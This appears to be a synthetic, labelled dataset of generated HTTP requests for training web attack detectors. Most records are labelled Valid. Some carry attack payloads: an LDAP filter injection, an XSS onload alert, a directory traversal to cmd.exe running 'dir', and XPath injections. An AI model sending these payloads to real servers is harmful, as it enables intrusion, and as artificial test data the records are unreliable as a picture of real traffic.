Date: Fri, 27 Aug 04 22:13:14 UTC
ETag: W/"llg5Z1uJoPv5Esu2"
Expect: 100-continue
From: nrne6nts@ueh4ulucb.st
If-Modified-Since: Fri, 23 Sep 05 16:45:58 GMT
If-Unmodified-Since: Sat, 20 Oct 07 19:36:34 CET
If-Match: *
If-None-Match: "Ed0Tj.DNHMVjSPEpAI2k"
If-Range: Tue, 06 Jan 09 11:00:31 UTC
Max-Forwards: 935
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM UnlhcHNNNGVmaG9iZWVpdGRpdGl2czJlU3M3bkVzcnNuMG5vZGdjR3V1M3Rlcw==
Authorization: Digest realm
Range: -785968,-02
Referer: http://www.meiAIl.de/dsR4/9gOxta.jpg
TE: deflate,trailers
Trailer: Max-Forwards
User-Agent: nVV09vAQk http://www.otoo8ov.fr
UA-CPU: x86
UA-Disp: 150,488,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 674x357
Via: 8.1 www.aEpr.htm, 4.9 www.ba9ca.tiff, eor3ui/4.5 www.darepecf.css
Transfer-Encoding: deflate
Upgrade: wbigqt/6.4, hv08se/7.5, ses/3.0, iei/9.4, n6vl/4.7
Warning: 805 www.tiToe.js:8 "nemt6tdhmtanm" "Sun, 01 Feb 04 01:16:58 CET"
X-Forwarded-For: 181.160.254.196
X-Serial-Number: 80895113
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17181
Start - Id: 20043
class: Valid
GET /ZORk-wk/pq5h4I6hooGSMyBwT8k/on_j4A.bin? HTTP/1.0
Host: 231.66.114.174
Connection: lrw7tler
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: veelsAt-ixihei
Cache-Control: no-cache
Client-ip: 193.232.37.177
Cookie: h6srltuhN=3;uOtketersePmlw=ot;teeholp=nep0dr$sy;zT4w_=rxCtwpWo;merrrnr=int3Ds4T
Cookie2: $Version="357"
Date: Sun, 19 Jun 05 16:26:46 GMT
ETag: "Ac2dF0ZFjo7.ddgVOmoT"
Expect: 100-continue
From: npvz8ts@megrcNfoe.biz
If-Modified-Since: Wed, 09 Feb 05 21:05:43 GMT
If-Unmodified-Since: Tue, 16 Mar 04 13:48:59 GMT
If-Match: *
If-None-Match: "pxIN9ITDQak-2aLS-5"
If-Range: Tue, 27 Jul 04 01:19:26 UTC
Max-Forwards: 6780
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic bUVsZnR0cjpqcTRE
Authorization: Basic bWZyeW8yczpyZXJzUQ==
Range: -58,-75483
Referer: /otcerc/eaeos/niirnAO/rxwhEl.aspx
TE: deflate;q=0.8
Trailer: Upgrade
User-Agent: rsictomo (feVHQ@5; rvr8LMMF68; e7.HpqyYnX; mWq-CqRn; aDzV4AINk)
UA-CPU: PowerPC
UA-Disp: 6419,466,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6883x9445
Via: oilep/5.4 www.higj.tiff, HTTP/0.2 www.o5fhdg.shtml
Transfer-Encoding: compress
Upgrade: Ist1/7.0, ttt/1.5, lehni/5.0, nrsgxc/3.7, eeer/9.7
Warning: 996 180.155.102.48 "tendxeafih" "Tue, 25 Sep 07 03:34:00 UTC"
X-Forwarded-For: 251.150.56.132
X-Serial-Number: 438818323
----: --------------
~~~~~: ~~~~~~~~~~

null

End - Id: 20043
Start - Id: 26749
class: Valid
GET /wlCbTq@/emdntd/hialtnPaiIllTl6iavh.css?ay8esoJe=++urndw8%3Atrirs%3Ca+&-e6b9W0auf=sc+ecd%28N4d&dJu5lirnyieu=m&bpuet=65827500&fdjyeaoosju=+img&wHTawuodpe=nzmOnzhhmen1orfh&n7Jlsh=%29%5C1r+hopt&rr7Leil0=togge&mhaush=rs&rnhee=293069 HTTP/1.0
Host: 55.152.184.151:46611
Connection: close
Accept: text/*;q=0.6, text/html
Accept-Charset: x-mac-japanese;q=0.4, iso-8859-8, iso-8859-1, windows-1255;q=0.4, iso-2022-jp;q=0.1
Accept-Encoding: deflate;q=0.6
Accept-Language: *
Cache-Control: aolmfopn='2ahu'
Client-ip: 9.95.68.90
Cookie: 35ikeaxton= (Pn
Cookie2: $Version="905"
Date: Wed, 25 Jun 08 11:14:44 CET
ETag: "psob@G4aDsjIxX8qnJ"
Expect: 100-continue
From: ttrelh@st8tsnvenE.cz
If-Modified-Since: Sun, 14 Nov 04 23:11:20 GMT
If-Unmodified-Since: Mon, 17 Sep 07 20:22:29 GMT
If-Match: "YOsjeCo20EjFVyEs"
If-None-Match: *
If-Range: Sun, 09 Mar 08 04:29:30 GMT
Max-Forwards: 6
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest qop=sucr8m
Authorization: omvses rBoytsC=xhal
Range: -57041,-09975,-61
Referer: /meescnf/Oipee/behia/gppzi.nsf
TE: chunked;q=0.1
Trailer: Range
User-Agent: inmrlo/4.8.4.1.9
UA-CPU: MIPS
UA-Disp: 8774,317,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 358x270
Via: HTTP/2.0 www.abhu4at.jpeg, HTTP/5.9 www.nn3rlee.js, HTTP/7.0 www.oaDy.jpg:32
Transfer-Encoding: identity
Upgrade: oudin/6.7
Warning: 965 www.0wzrtTa.png "69tmc3aheyaasmaDo" 
X-Forwarded-For: 184.128.191.151
X-Serial-Number: 1194043277645
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26749
Start - Id: 37367
class: LdapInjection
GET /unlGjposes/IsamxtermOf9qor.A/ytoe/gfxBmmvO.NUU15RP9/rmiqxUHzQ_JhyAT/7I/jad0rEhcbt31/xZlibNt-KKG809No/9ojpnie5eodotygdtn/gaineoosXXds2laneai/n2Hqcl9ppBu-/logm.pl?7aRrrqinx=41825228&dmoAtesraey=846&AeiDVOhV71=s&itdosTeWfn5cdd=itosi HTTP/1.0
Host: www.nhuthtin.st
Connection: keep-alive
Accept: image/png;q=0.6, audio/*, application/*
Accept-Encoding: 629)(&(objectClass=aqA)(|(sn =  4o)(cn=e J*))
Accept-Language: *;q=0.7
Cache-Control: max-age=7557
Client-ip: 78.155.9.193
Date: Fri, 15 Aug 08 17:12:48 UTC
Max-Forwards: 0
Referer: http://www.deenth.be/dboonni.png
Trailer: Pragma
User-Agent: Lm2lscl4V4/2.9.6.8.0

null

End - Id: 37367
Start - Id: 3672
class: Valid
GET /7KBformvv/npweeuA.gif?athtsdbtunenna=stding&mso6sckeg=33&ewh6nulhyrTnol=eEPbrvu4MZv&tlRpBnetcddxsnh=e0YWj&zMUt4nAqQVGe=ed9Ob&5ocjeeis=p28Wp._hhpVD&yrtro=nviz4e4apn&hrw=1099809877&tns=ejne7c6&rftoesseci=ipo27Oeltrstyle&KtKzDNLU=95736254&calhibrtth1=0&pe9=Omail&4et=00247877&replaceE_Vpm02d=a3.0TM8 HTTP/1.0
Host: www.milgoinsa.it
Connection: o0er
Accept: */*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: nsgrhr-mRL, e-aiuime, h-u;q=0.0, ilf-ataimno
Cache-Control: no-store
Client-ip: 45.245.87.100
Cookie: s2cre=Er0fhjlhgecvfeehM;Si1nVB=trrprocessing-instruction&6b
Date: Mon, 03 May 10 07:49:44 CET
ETag: "Lv8LbWgIruwbt1BUHz"
If-Modified-Since: Thu, 22 May 08 18:01:43 CET
If-Unmodified-Since: Fri, 30 Jan 09 22:04:38 UTC
If-Range: Tue, 06 May 08 14:35:08 UTC
Max-Forwards: 736
Pragma: no-cache
Authorization: Basic YXVFbmVwZWE6dTlzYQ==
Referer: http://www.mcetx1t8.it/tuwcxnnv.txt
User-Agent: Mozilla/0.4 (compatible; eqsgTyjhe; Unix; nipdxet; l2n5nb)
UA-OS: Mac OS X
Via: 9.4 157.255.105.221, HTTP/6.5 104.136.247.108:38662
Transfer-Encoding: gzip
Upgrade: oyne/3.7, canbe/4.3, fon/8.5
----: --------------------

null

End - Id: 3672
Start - Id: 22104
class: Valid
GET /Bm/Neyeeplpo/8fceobhoierettoly9/YyPoirG/isEpjYm.asp?r4ao5=datdhe0s&uoeptodo=xafieealdeu4nnm&sHyL3mw0accept7=u&uee1mey=680258&pd5Y=88836565&uoLsis=5hz&se=7779&8nMlti=sxmrgzi&NH8HSrQupdateB3p=nwiswrne00pl6 HTTP/1.0
Host: 213.47.147.214:64
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.8
Accept-Language: *;q=0.1
Cache-Control: qmemuga=tp5f
Client-ip: 12.17.95.95
Cookie: vClnodeL= tetFi;._IU=);T3W1V=a0nihd4;miesiaus3rce=rj9h3QRqc
Cookie2: $Version="5"
Date: Sat, 26 Apr 08 07:29:24 UTC
ETag: "LacjLBXku.K2a0kE9RB"
Expect: raried
From: dren@Ttoersyr6.com
If-Modified-Since: Fri, 07 Dec 07 08:51:36 GMT
If-Unmodified-Since: Mon, 01 Nov 04 18:28:57 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 01 Oct 09 15:56:32 UTC
Max-Forwards: 0
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic aWFydHA6ZmVjaWM=
Authorization: cuOtTx euimanhd=xiEssr8h
Range: -212,11-,-0
Referer: /ree8.zip
TE: trailers,deflate;q=0.0
Trailer: Proxy-Authorization
User-Agent: c@IxfLU6 http://www.9eawl.com
UA-CPU: PowerPC
UA-Disp: 1342,370,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8724x0388
Via: 6.4 17.74.34.133, 8.9 107.172.180.50, HTTP/4.5 245.221.253.150
Transfer-Encoding: deflate
Upgrade: sdqs/1.2, otap/2.3, suO/8.6, t03/1.8
Warning: 503 www.atcO.png "aniinsIheewgiof" 
X-Forwarded-For: 72.161.125.176
X-Serial-Number: 42920569636252963929
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22104
Start - Id: 2271
class: Valid
GET /qau3cKNBmJ6whereAbT/craCdiphsie/rasHonrniskfaoa0/eiuxHW/Oae9ygddhiEna/nmdoe8s3e/nRe7Q.html?N_FaV7JhVtmpQQ=351572646&6f1ecci=b+Ge&dropBfQO=rQI&asAmnme=noosexec&sdd=l6noboot.inig%26https+teqeg3%7Er%2Br&ERL9iCya0-xp_etc=eImyl HTTP/1.1
Host: www.wsmce8rq.uk
Connection: doott
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: max-stale=52
Client-ip: 111.99.151.212
Cookie: 5efbb=714619662;iNa=tlaLAz;tes8tdgmewr3=7868;dlnstr=%t cb;letrzCrhqroontn=neat
Cookie2: $Version="88"
Date: Mon, 18 Apr 05 11:32:56 UTC
ETag: "czBkLOu.NNn9-8RH"
Expect: 100-continue
From: oniNcb@l92ecsed.it
If-Modified-Since: Thu, 29 Apr 10 06:27:20 CET
If-Unmodified-Since: Fri, 25 May 07 13:24:02 CET
If-Match: *
If-None-Match: "8wTXDti6MY5I4SAK"
If-Range: *
Max-Forwards: 0
MIME-Version: 2.7
Pragma: fOte='hnttBta'
Proxy-Authorization: Digest username="hheA"
Authorization: NTLM aXhlcjJhTGVlZ2VvbmVpcWtuYWJnOXJvb2VvZXRvYXRBZQ==
Range: -458438,6075-5448
Referer: /p9ut.php3
TE: trailers
Trailer: Accept
User-Agent: Mozilla/1.8 (X11; U; SunOS sun4u 2.5; ae-ee; rv:2.0.5) Gecko/81444516
UA-CPU: StrongARM
UA-Disp: 006,895,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6264x742
Via: 6.8 64.18.82.178:94, 3.3 189.71.162.101:0017, 3.6 113.60.61.58
Transfer-Encoding: deflate
Upgrade: hnn/7.3
Warning: 901 www.otieo.jpeg:79 "bTRphwcd" "Sat, 18 Dec 04 03:27:02 CET"
X-Forwarded-For: 211.5.1.135
X-Serial-Number: 61486796053346804
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2271
Start - Id: 8195
class: Valid
GET /9hnosasd/yhlfaruun9o/lvGpg1feUupX6LLJ/swDT7_Yps/corrachnqhU/2eLJNzE2loNa6hf.css?deepe=gtenthTwget&aat5utsipmraieN=42&om3sh=196734383&a4naok=supdateHddabhttpylBuatmpbR8+&WKM@copyq=4int&wcey=2756&dsoaher=8098&ln=6&MhrpN5e=7&SezmflrlleoiIc=aamhs&nFelt=7&no=group+byf%5Behdrzrmt&eDueeEizatei=ySCmIQD9fl&q7fQ0Pc@AT3E=hgFa6ers2osi HTTP/1.1
Host: 141.122.124.129
Connection: eLnzaeh
Accept: application/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.7
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 87.9.157.161
Cookie: rmonhn=tnTAe7Ta7rC;lr=tAahs;memrat1vzeaso=evi9G;LXGc=x3d;aignmstyvznihuh=eijeluighcolta8ok;bpMl5estdin6sw=dysii40
Cookie2: $Version="2"
Date: Thu, 18 Mar 04 21:49:18 CET
ETag: W/"EOXO9OYaUDsivz7"
Expect: 100-continue
From: iyfdu@nabsveeOr.de
If-Modified-Since: Wed, 25 Jul 07 16:34:11 CET
If-Unmodified-Since: Mon, 14 Nov 05 23:30:36 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 69
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic cW5kcm5pOmdzaWFn
Authorization: Basic cnRxdDpBNmxR
Range: -155,-198
Referer: http://todlfe0.fr/meafR5r/neoaei/tsqwsx3r/asdsr/Ui1cri.php
TE: gzip,gzip;q=0.9,chunked;q=0.2
Trailer: Accept-Charset
User-Agent: n3PelusP http://www.l6n3.net
UA-CPU: x86
UA-Disp: 260,910,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1852x378
Via: 8.1 www.le7iyte.png, HTTP/1.6 243.131.91.241
Transfer-Encoding: compress
Upgrade: 9o6e/7.7, eaTRi/7.4, yaoEli/5.7, rnj/7.6, pad/2.0
Warning: 689 128.202.115.69 "ilceonto6elpOdo9ca" "Thu, 24 Jun 04 13:57:23 UTC"
X-Forwarded-For: 216.1.28.119
X-Serial-Number: 81045574594520616
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8195
Start - Id: 47582
class: XSS
GET /iY5/rX5ETPkwp5/7mjpdMm@bXx/aviPSymb/shag55uy0ttyece3p/sicrrauaE1gnrxe/iB/a9EOENeAar5Puot8hF1/eduhctzgt/hVhj.htm?usLst7St=%3DlzoH%5Crs&yssersu=7opwe&zrgr8K0tCesYx=%5Cn&a7anhxgicLlmoae=3942108&lpvoo=r%3E%3Cttcg&tdr0da2ao=asldux+&KvJi=4&CfheeRopkRDtaod=ncan6xa&dihogee5egtpy=pn4hl36pmRtwsr&FB7W_v=%3Cbody++++onload+++%3D++%22+%5Balert++%28%27bE%27%29%3B%5D++%22+%3E&hfsjj=dKzY HTTP/1.0
Host: www.6w6gZjqc.org
Connection: keep-alive
Accept: audio/basic, video/mpeg, video/*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.9
Cache-Control: max-stale=911
Client-ip: 118.106.166.150
Cookie: yso8reay=a5TPe
Cookie2: $Version="3"
Date: Thu, 24 Feb 05 17:55:42 CET
ETag: W/"ykYpVFv4o2eRsz_1U"
Expect: 2eEi8
From: i5nNat@viikl.cz
If-Modified-Since: Fri, 19 Jun 09 01:51:24 UTC
If-Unmodified-Since: Mon, 31 Aug 09 23:36:34 CET
If-Match: "nFdZo1UgkTYO85hNkSR"
If-None-Match: *
If-Range: *
Max-Forwards: 9341
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest qop=m2ta
Authorization: NTLM dHZhc2VzeVNvbXNnYXNobGg1bmU1bGFkbW9tbzl2OGF0cjZzdHU=
Range: 849916-
Referer: /Ee1se/esgtc1r/gadob/7unz9.bin
TE: trailers,deflate
Trailer: If-None-Match
User-Agent: Mozilla/7.5 (Windows; U; Win 9x 1.0; g9-ia; rv:1.5.9) Gecko/52531698
UA-CPU: StrongARM
UA-Disp: 2757,1725,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 924x017
Via: HTTP/1.5 131.21.20.244, iktlJz/9.6 www.ies9.htm:10500
Transfer-Encoding: gzip
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 205 168.163.244.39 "rui0nun" "Thu, 26 Jan 06 03:08:13 CET"
X-Forwarded-For: 85.223.190.150
X-Serial-Number: 2524902769036083814
----: -------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47582
Start - Id: 44238
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 225.193.121.121:80
Connection: keep-alive
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.8
Cache-Control: min-fresh=40
Client-ip: 157.29.164.15
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="9"
Date: Mon, 23 Jul 07 06:24:01 UTC
ETag: W/"ZSz6CGXGK.XnFvDbA3Ds"
Expect: 100-continue
From: ided@udhoes.uk
If-Modified-Since: Wed, 01 Mar 06 01:04:52 CET
If-Unmodified-Since: Mon, 07 Mar 05 11:34:53 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 67
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic aHRybng6ZWxMYQ==
Authorization: tOde nurp1=vlcwt
Range: 347-
Referer: http://ib8ABnt.gov/6iat4ped.htm
TE: gzip;q=0.7
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.2 (Windows; U; WinNT 1.6; tt-xk; rv:9.7.6) Gecko/77227408
UA-CPU: x86
UA-Disp: 220,5543,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 352x848
Via: ope/1.8 62.62.143.236:28778, meretn/5.3 www.sro8rN.shtml
Transfer-Encoding: gzip
Upgrade: eylet/4.8, moe/0.2, jtiu/7.5, ratas/1.7, ott/5.5
Warning: 992 www.i1e3itee.jpg "capc8tz" 
X-Forwarded-For: 242.235.213.130
X-Serial-Number: 03684084743839515584
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44238
Start - Id: 48308
class: XPathInjection
GET /ncNmochaobjectkRetc/ype0teiYoopbrn/akGGVY7DZ/dz_uRF61t7UdE2f/yw-PhymoayXSxbdO1..png? HTTP/1.0
Host: www.anoshM.gov:57558
Connection: close
Accept: video/*;q=0.4, video/quicktime
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.9, deflate
Accept-Language: e1i2g' or  path/child::node()[position()=N]     or   'bt0'  = '
Cache-Control: max-stale
Client-ip: 95.235.160.12
Cookie: OvCL1=ai 0naowi@Y;ergeqdsddseiiS=lqe;sLaoe6bois=supdatennfaeO0Oxukm;s7rm=yua;xiBeeypn8=$aRnh
Cookie2: $Version="9"
Date: Mon, 21 Jun 04 18:26:39 UTC
ETag: "2KIWKzWduVN1OabZszC"
Expect: preieae1=rrnnt7r
From: eoohueg@assyib.com
If-Modified-Since: Sat, 26 Feb 05 18:26:27 UTC
If-Unmodified-Since: Sat, 03 Feb 07 10:40:53 GMT
If-Match: "tm1ctgJOAC5s_X@4XdT4"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 6.0
Pragma: edgh='awAsmtn'
Proxy-Authorization: Digest nonce
Authorization: Basic aWVuc3dyOmJUcm5udXQ=
Referer: /63qieral/cwstEs/eitkm/oaooa1mt.jsp
TE: trailers,gzip
Trailer: Proxy-Authorization
User-Agent: n9jfqq http://www.asYad.cz
UA-Disp: 296,6544,16
UA-Pixels: 433x249
Via: HTTP/5.7 www.qokt8v.tiff, FTP/9.0 www.brsAet.jpeg, HTTP/6.7 29.64.100.145
Transfer-Encoding: identity
Upgrade: rkeue/0.5, esr10/3.0, 1eda/2.9, seo/9.6, 7lh/2.5
Warning: 921 126.58.93.52 "hbteArrtekqfbneX" 
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 17618194843
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48308
Start - Id: 15257
class: Valid
GET /co/VQiscript5jXYXUmF3Q.cfm?npfoexle=0486067&UsfeSgpsaia=1373596&Ll61rh1tezlsn=97&JOC7dcopencatxp_bin=eo%40pJXzrx&uvG7e4ari5s=loeeoAispesJ8Rr0&d9acth8y=kEa69eoweomqmtoaee&RYgm_g8S9w=%2FHpet+eu+o%25stdin3sablis&tstiwSdttioi=tFZ1RQ.VN&p3iiae9cp6S=dBfkafm&fXahVehvd=o%27ry&ala0sc2ioter=o2R&iltjgriiociyx=34&9lti0rq8Iifo=7351 HTTP/1.1
Host: www.tf2o.gov:3836
Connection: soot
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.3, identity, gzip;q=0.5, gzip
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 146.193.75.117
Cookie: OdropRoFTstdinB=uiZXs8tAq2fa;nsbisSkny=5;ne93uge9Oi=tLNOC042yJ;yDlink4winnt=enseeTa5o?>g;pl=6666
Cookie2: $Version="895"
Date: Fri, 19 Dec 08 19:43:30 UTC
ETag: W/"Cygi3fqm9GyaWa2"
Expect: 8oNm=hcoe0
From: aecg@hens.de
If-Modified-Since: Thu, 27 May 04 16:04:58 GMT
If-Unmodified-Since: Sat, 18 Dec 04 14:39:32 UTC
If-Match: *
If-None-Match: "kCT2ZnWoO0-NRPlZ7zq"
If-Range: Thu, 27 Dec 07 19:44:39 GMT
Max-Forwards: 521
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: vt6o Ret2w3r=bHEdy
Authorization: Basic Z2FybnN3OnNNdDM=
Range: 70862-
Referer: http://www.et7eD.de/tlseTjs/calirr/mfrint/Ni186ejr/huisiaei.txt
TE: deflate;q=0.1
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.0 (Machintosh; U; PPC 8.6; Oa-cc; rv:4.3.0) Gecko/07683611
UA-CPU: PowerPC
UA-Disp: 661,7320,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 175x9558
Via: HTTP/5.3 www.aIlmnns.js
Transfer-Encoding: deflate
Upgrade: 3mbtt/4.9, e4asi/7.0
Warning: 019 www.wlaLP.png "ndRtmrHiahcCIolrn" 
X-Forwarded-For: 231.138.207.226
X-Serial-Number: 82459741903687
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15257
Start - Id: 20816
class: Valid
GET /naqaOt/aAQ@9lNiQHEeiby.3N7/dF3U66KwplUSX-xA/M_bh/v7Odm9aheteeear/zsbeeqoJnniemnmxe.png?nimg2aiXpMi=43&osuoa=%29nelidheehh&egn=ioo0rlg&qjzexec7=aQCFa&ah7=485&fdar=19010186&iermpw=Oda%2F&uusdtuhafo5a=8iihckxterm1%3Fhonsoio&o8tdenrfierwh=psRoes%40 HTTP/1.0
Host: www.thlNwEoto.biz:0
Connection: close
Accept: application/x-tar;q=0.3
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: oDe-beEn, odsnkeus-u, uk-id;q=0.5
Cache-Control: only-if-cached
Client-ip: 132.252.70.171
Cookie: w2ttr5nsisshc=rmA8CJG.;eosseia=ozAs;mkdnt6ttke=911331
Cookie2: $Version="5"
Date: Sat, 11 Apr 09 16:51:51 CET
ETag: "ozv0I9yu-_oPwFHK@oA"
Expect: tvs7otwN=ucuxia;ehaudht=eitn
From: itbAy3@24cao.it
If-Modified-Since: Tue, 28 Dec 04 18:52:11 UTC
If-Unmodified-Since: Tue, 18 Sep 07 03:26:07 UTC
If-Match: "ejlgHsmUzCj1ZrG"
If-None-Match: "uB505UxwHa43.IO"
If-Range: *
Max-Forwards: 62
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: neczgh sdasses=faohlid7
Authorization: mUsh etDwtht=Wfqn
Range: 05030-356,-016,3009-
Referer: http://aaeeatos.org/aucttWMh/amkdb/inby/abLeiE/edwaer.swf
TE: trailers
Trailer: If-Modified-Since
User-Agent: nEavi (uvO995n; m6oJ8ou; a-h_.bW; hYQfB2ft)
UA-CPU: PowerPC
UA-Disp: 5311,821,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3856x4150
Via: FTP/8.7 www.eleemei.jpeg, 6.2 159.3.92.147
Transfer-Encoding: deflate
Upgrade: 0hs2/4.7, 6tshK/5.2, fttq/6.5
Warning: 085 www.pbde.html "arioyrbdaIltra" "Sun, 18 Jan 09 17:29:03 GMT"
X-Forwarded-For: 196.176.140.95
X-Serial-Number: 390733
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20816
Start - Id: 13374
class: Valid
GET /nnnucoat/t5BIlT0Hu7JLZIuSeM4v/2sHsrryunh4nb4eierp/htZzd/ne4J/t64bMazTyBQ7/i9bdrdeeieori/acnaubccaoeheon.png?suahR=89&5ena=iGBU&FegcyvyiZhel=74&lsldwtDsntf=396&cinIetendcoal=leara&otsoapdknAb=o5lOe4%26he4r1&inono=dn&unvctZ64xxt=4rwNrrOl+na&eeu=5385 HTTP/1.0
Host: 90.193.26.228
Connection: close
Accept: */*
Accept-Charset: euc-tw, big5, x-mac-turkish;q=0.3
Accept-Encoding: gzip, deflate;q=0.9
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 88.65.120.166
Cookie: 4catBJV8A-=8589738;bun1tesDTy=nz@dP0Yit;se4o4j=cctowqwindow.openi;lo=deaigi;pes=3522
Cookie2: $Version="9"
Date: Tue, 26 May 09 23:22:10 GMT
ETag: W/"S7OycLOuM3B-ZwP0fm"
Expect: 100-continue
From: 4butpT@e0niqeT8.uk
If-Modified-Since: Wed, 28 Feb 07 21:47:35 GMT
If-Unmodified-Since: Fri, 04 Aug 06 13:37:08 CET
If-Match: "LvCpeEjbmpunnMtF"
If-None-Match: "fXaikx1-@TyOOJ2bOLj"
If-Range: Thu, 24 Aug 06 03:37:43 GMT
Max-Forwards: 3576
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: aaigsv lkaeTa=nvn1feN
Authorization: Basic RmhzZWluOmVlaG1s
Range: 1644-,849-4799,90661-23978
Referer: http://www.tqos7nda.fr/Iotie/ceaamon/inm0gz/6ewodm/6m3awTmi.swf
TE: chunked;q=0.2,trailers
Trailer: Warning
User-Agent: o-dKVew http://www.ekazo6he.de
UA-CPU: x86
UA-Disp: 6806,3540,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8753x0793
Via: 0.7 201.133.41.30, 7.3 64.162.13.23, 9.9 www.7e2re.js
Transfer-Encoding: identity
Upgrade: Lda5tx/2.4, e2i/2.7, aeej/6.6, ers/1.0, sPr0/5.9
Warning: 179 www.bavgex.js "ahhenfcehln" 
X-Forwarded-For: 235.128.16.55
X-Serial-Number: 24972909787990120548
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13374
Start - Id: 48551
class: XPathInjection
POST /oS3ce8snsSur5sixohe/txCuckFhfLFh/df3OupdateFdw/KOivEG.exe? HTTP/1.0
Content-Length: 380
Content-Language: eie,up4
Content-Encoding: compress
Content-Location: /b8OTd/mlh0ieG/e3aS/DauWe.html
Content-MD5: cGFTbjdIZ2NlcmUxVXJwbA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Feb 06 18:27:43 CET
Last-Modified: Thu, 17 Jun 04 06:09:51 UTC
Host: www.7nhe2a.net
Connection: keep-alive
Accept: audio/*;q=0.0, application/postscript;q=0.1, text/html;q=0.3
Accept-Charset: x-mac-ce, koi8
Accept-Encoding: 
Accept-Language: swvs-miat, norlrdeA-nectqsp, ciSty-nkb, 7-ve8mFmr;q=0.1, oahtIh7b-ueci;q=0.7
Cache-Control: no-store
Client-ip: 102.113.223.214
Cookie: OntOpeu=8708;uneBdhly=58167504;ioomrzrs8=977421;qvOuuj4Eag1lne=0t sOtaoopene&t;
Cookie2: $Version="96"
Date: Wed, 20 Jun 07 16:55:34 CET
ETag: W/"9a.@kRmZK0277p2HO0wo"
Expect: wnoeeHd
From: 5lotN@aerqwne.st
If-Modified-Since: Tue, 04 Oct 05 02:09:24 UTC
If-Unmodified-Since: Fri, 27 Feb 04 02:00:01 CET
If-Match: "GvhUGbSDmQ1Xtoz"
If-None-Match: "fSYY-HRGuP_x8tQs"
If-Range: Sun, 01 Jul 07 11:02:42 UTC
Max-Forwards: 4
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM cm1zbFN2OW5hdHlkYmhmb0xrZ1lpRTRhb3F0c3B5ZFNob2UybQ==
Range: 4-,9-
Referer: /6mve.cfm
TE: chunked;q=0.8,trailers
Trailer: Via
User-Agent: Mozilla/0.5 (Windows; U; Win 9x 9.0; we-va; rv:1.8.6) Gecko/02022883
UA-CPU: StrongARM
UA-Disp: 8923,087,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 429x1759
Via: FTP/9.7 143.89.197.3, HTTP/3.0 www.oricnAfx.jpeg
Transfer-Encoding: compress
Upgrade: lexe/0.2, mX4rfi/5.5, ue5de/1.9
Warning: 055 209.226.85.199:70292 "mEpIrti5alp3ed" "Wed, 13 Sep 06 22:52:18 CET"
X-Forwarded-For: 252.38.234.200
